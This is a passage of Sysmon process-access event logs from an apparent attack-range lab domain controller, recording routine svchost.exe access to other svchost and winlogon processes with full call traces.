{A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1636\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1636","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|c:\\windows\\system32\\themeservice.dll+144a|c:\\windows\\system32\\themeservice.dll+4175|c:\\windows\\system32\\themeservice.dll+3379|c:\\windows\\system32\\themeservice.dll+31a3|C:\\Windows\\system32\\svchost.exe+1380|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2629,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1236\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-0010104A0000}\r\nTargetProcessId: 784\r\nTargetImage: C:\\Windows\\system32\\winlogon.exe\r\nGrantedAccess: 0x147A\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\themeservice.dll+3de3|c:\\windows\\system32\\themeservice.dll+26c0|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1236","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-0010104A0000}","TargetProcessId":"784","TargetImage":"C:\\Windows\\system32\\winlogon.exe","GrantedAccess":"0x147a","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\themeservice.dll+3de3|c:\\windows\\system32\\themeservice.dll+26c0|c:\\windows\\system32\\themeservice.dll+1ed0|c:\\windows\\system32\\themeservice.dll+2006|C:\\Windows\\SYSTEM32\\ntdll.dll+45079|C:\\Windows\\SYSTEM32\\ntdll.dll+29bfa|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2630,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:13.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A5B80000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:13.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A5B80000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C